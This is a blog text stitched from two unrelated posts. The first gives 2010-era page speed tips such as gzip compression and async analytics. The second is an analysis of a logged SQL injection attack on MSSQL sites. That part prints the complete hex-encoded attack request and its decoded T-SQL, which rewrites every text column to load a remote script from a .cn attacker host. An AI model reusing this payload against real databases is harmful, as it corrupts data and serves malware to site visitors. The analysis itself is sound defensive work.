In a Webmaster Central Blog entry (Using site speed in web search ranking) dated Fri, Apr 9 2010, they finally made it official.

So give your pages a little overhaul and get them up to speed!

Following is a selection of tools and options you can use to increase your page’s speed:

Speed Testing:

Download and install Google’s Page Speed tool for Firefox and run it to get an idea of what can be optimized.

After:

Install the Web Developer Add-On for Firefox and check the document size (Web Developer > Information > View Document Size):

After:

Or try Zoompf’s performance tester: http://zoompf.com. It returns a long list of issues including solutions.

Compression:
Chances are all speed testing tools will tell you to enable (gzip) compression if you haven’t already done so.
To check if your site currently has compression enabled, check out GIDNetwork’s web page compression / deflate / gzip test tool: http://www.gidnetwork.com/tools/gzip-test.php

To enable compression, you can either add a couple of directives to your .htaccess file, or add one single line of PHP to your page:

.htaccess:

<Files *.htm>
SetOutputFilter DEFLATE
</Files>

This directive compresses all *.htm files.
To add compression for other file types, simply add more file types to your .htaccess file:

<Files *.css>
SetOutputFilter DEFLATE
</Files>

If you don’t have access to your .htaccess file or if your server doesn’t support mod_deflate, add this line of PHP code to your page(s):

<?
if (substr_count($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip'))
    ob_start("ob_gzhandler");
    else ob_start();
?>

What it does is to check for the presence of "Accept-encoding: gzip" in the request header and returns a gzipped version of the requested file, otherwise it returns the regular (uncompressed) version.
(Note: We don’t have .NET or .ASP or IIS solutions. Please don’t ask.)

Deferred JavaScript Loading/Asynchronous Tracking:
If you are using Google Analytics, there is yet another little trick. Have you noticed the new "Asynchronous Tracking" in your Analytics settings? Google announced it in December 2009 (Google Analytics Launches Asynchronous Tracking), and you can find it under Analytics Settings > Profile Settings > Tracking Code

Replace your existing Google Analytics code with the new code and it won’t delay rendering of the page, meaning you can put it in a higher spot in your page’s code.

Tools (Firefox addons – require Firebug):
YSlow: http://developer.yahoo.com/yslow/
PageSpeed: http://code.google.com/speed/page-speed/
Web Developer Add-on: https://addons.mozilla.org/en-US/firefox/addon/60

Online tools:
Slowshow: http://www.showslow.com/
GIDNetwork: http://www.gidnetwork.com/tools/gzip-test.php
Zoompf: http://zoompf.com/
Webpagetest: http://www.webpagetest.org/test

UPDATE (8-23-2008): Looking for answers? Check Part 2
UPDATE (8-25-2008): Securing your forms to prevent future attacks

I am not worried, but I am annoyed. Because all these attempts seriously taint our log files and our analytics results. Besides causing unnecessary traffic.

But I am also very curious by nature and had an hour or so to kill, so I decided to look into it a bit.

Take the query string and translate it into human-readable format:

"GET /myfile.php?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x44
45434C415245204054207661726368617228323535292C4043207661726
3686172283430303029204445434C415245205461626C655F437572736F72204
35552534F5220464F522073656C65637420612E6E616D652C622E6E616D65206
6726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776
865726520612E69643D622E696420616E6420612E78747970653D27752720616
E642028622E78747970653D3939206F7220622E78747970653D3335206F72206
22E78747970653D323331206F7220622E78747970653D31363729204F50454E2
05461626C655F437572736F72204645544348204E4558542046524F4D2020546
1626C655F437572736F7220494E544F2040542C4043205748494C45284040464
55443485F5354415455533D302920424547494E2065786563282775706461746
5205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F74697
46C653E3C736372697074207372633D22687474703A2F2F777777302E646F756
8756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212
D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C6
96B6520272725223E3C2F7469746C653E3C736372697074207372633D2268747
4703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A732
23E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524
F4D20205461626C655F437572736F7220494E544F2040542C404320454E44204
34C4F5345205461626C655F437572736F72204445414C4C4F434154452054616
26C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1"

The Query String uses CAST to hide the actual SQL statement in hexadecimal code, so in order to *read* it, we need to translate the CAST content (everything else should be fairly easy to translate – %20 = space, etc).

The easiest way to do it is by using perl:

perl -pe 's/([A-Fa-f0-9][A-Fa-f0-9])/chr(hex($1))/ge' < in > out

The output is:

DECLARE @S CHAR(4000);SET@S=DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S)

(Of course sysobjects and syscolumns are tables found on MSSQL servers)

Other query strings found in our logs translated to other domain names, so far all of them were Chinese (.cn) TLDs, and all of them pointing to a script w.js in the directory /csrss (www2.1000ylc.cn/,sdo.1000mg.cn/, and others).

The host IP addresses could be traced to locations all over the world, and whether they’re legitimate or not doesn’t really matter.

If we try to access the above domain www0.douhunqn.cn, Firefox greets us with the following message:

If you don’t know what you’re doing, I would strongly suggest that you DON’T try to access the site — I have a screenshot of the script here (click the image for a larger version):

But you can download a copy of the script (zipped) here (don’t say we didn’t warn you if something goes wrong) and trace all the URLs it is loading and accessing, check all the iframes it is generating and the files it is trying to download:
JavaScript File

The above is only one of many sites being used as the host for those malicious scripts, just Google the strings used in either the script or the SQL statement and you will see quite a bunch of infected pages.